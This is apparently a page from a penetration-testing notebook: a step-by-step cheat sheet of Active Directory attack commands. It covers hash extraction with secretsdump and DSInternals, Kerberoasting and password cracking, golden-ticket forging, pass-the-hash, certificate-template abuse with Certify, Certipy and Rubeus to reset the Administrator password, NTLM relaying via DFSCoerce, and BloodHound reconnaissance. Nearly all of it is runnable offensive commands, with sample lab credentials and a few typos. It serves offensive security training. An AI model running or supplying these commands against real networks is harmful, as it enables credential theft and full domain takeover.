🎓Advanced Penetration Testing

Remote extraction of AD hashes

Import-Module DSInternals

$cred=Get-Credential

Get-ADReplAccount -SamAccountName <victim username> -Server <Domain IP> -Credential $cred -Protocol TCP

Carry out a Kerberos roasting

python3 GetNPUsers.py <domain/> -dc-ip <domain ip> -usersfile <username.txt> -format hashcat

Crack the Hash

john <hash file> --wordlist=/usr/share/wordlists/rockyou.txt

Run a no-preauthentication attack

Service principal names - Win32 appsMicrosoftLearn

python3 GetUserSPNs.py cybex.com/jdoe76:JDPass2021 -dc-ip <domain ip> -request

john <hash file> --wordlist=/usr/share/wordlists/rockyou.txt

Forge a golden ticket (Post Exploitation)

What is a Golden Ticket? | Security Encyclopediawww.hypr.com

Prerequisite

Must be a local admin before doing this attack

Get the NT hash of Kerberos TGT

sudo python3 secretsdump.py cybex.com/aadama31:BlueMarble22@<domain ip>

Copy the NT hash for the user "krbtgt"

Copy the Computer Name

Extract the Domain SID

sudo python3 lookupsid.py cybex.com/aadama31:BlueMarble22@<domain ip>

Forge the Golden-Ticket

sudo python3 ticket.py -nthash <krbtgt hash> -domain-sid '<domain sid>' -domain cybex.com <username to create a ticket for>

Use the Golden-Ticket

export KRB5CCNAME=/usr/share/doc/python3-impacket/examples/akatt42.ccache

sudo python3 psexec.py cybex.com/akatt42@<computer name> -target-ip <domain ip> -dc-ip <domain ip> -no-pass -k

Note: "akatt42" is the username for which we have create the golden ticket previously.

Running a shadow attack

LinkedInlinkedin

Certipy Tool

GitHub - ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuseGitHub

sudo pip3 install certipy-ad

certipy shadow auto -u [email protected] -p Scorpion5 -dc-ip 192.168.1.5 -account adamant

Pass The Hash Attack

crackmapexec winrm <domain ip> -d cybex -u "adamant" -H <NT hash> -x ";hostname;whoami"

Taking over the domain using rubeus (Privilege Escalation)

LinkedInlinkedin

Identify a Vulnerable Certificate Template

certify.exe find /vulnerable

Request the Certificate

certify.exe request /ca:CA01.cybex.com\cybex-CA01 /template:PowerUser /altname:Administrator

Make sure to copy the whole body (from BEGIN RSA PRIVATE KEY to END CERTIFICATE). In order to successfully convert it we must have the private key itself.

Convert .pem file to .pfx file

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Host a python http server and transfer back the .pfx.

Now the next step is to simply generate and inject ticket for the issued certificate and enjoy being Administrator.

Rubeus

GitHub - GhostPack/Rubeus: Trying to tame the three-headed dog.GitHub

.\rebues asttgt /user:Administrator /certificate:admin.pfx /outfile:admin.tkt /ptt

Change the Domain Admin Password

.\rubeus changepw /new:BaronDielm4 /dc:DC01.cybex.com /targetuser:cybex.com\Administrator /tciket:admin.tkt

Relaying attacks to get a certificate

DFSCoerce

GitHub - Wh04m1001/DFSCoerceGitHub

Set up a Man-In-The-Middle relay server

ntlmrelayx.py -smb2support -t https://192.168.1.6/certsrv/certfnsh.asp --adcs --template DomainController

Using DFSCoerce

python3 dfscoerce.py -u sspade -d cybex.com 192.168.1.249 192.168.1.5

Save the baset64 encoded certificate

Decode the Certificate

cat cert64 | base64 -d > dc01.pfx

Extract the Private Key hash

certipy auth -pfx dc01.pfx -dc-ip <domain ip>

Using smartcards to gain privileged access

LinkedInlinkedin

Create a Smartcard

cmd> tpmvscmgr create /name samvsc /pin default /adminkey random /generate

PoshADCS

GitHub - cfalta/PoshADCS: A proof of concept on attack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)GitHub

PowerView

LinkedInlinkedin

Execute PowerView

PS> cat -raw PowerView.ps1 | iex

Execute PoshADCS

PS> cat -raw ADCS.ps1 | iex

Check the Access level

Get-ADCSTemplateACL -Name PowerUser | Format-Table AceQualified,Identity,ActiveDirectoryRights

Requtst for Domain Admin

Get-SmartCardCertificate -Template Poweruser -Identity offsec

offsec user is the domain administrator

Enter the PIN we have created previously

Check the virtual smart card

certiutil -scinfo

Enter the PIN

Set the BloodHound loose

BloodHound, Software S0521 | MITRE ATT&CK®attack.mitre.org

$ .local/bin/bloodhound-python -u jdoe76 -p JDPass2021 -ns <name server ip> -d cybex.com -c all

Start neo4j

sudo neo4j console

Change the Credentials for neo4j

http://127.0.0.1:7474/browser127.0.0.1

Run BloodHound

bloodhound

Ente the neo4j username and password

PreviousTesting Active Directory NextAutomated Tools

Last updated 1 year ago

Was this helpful?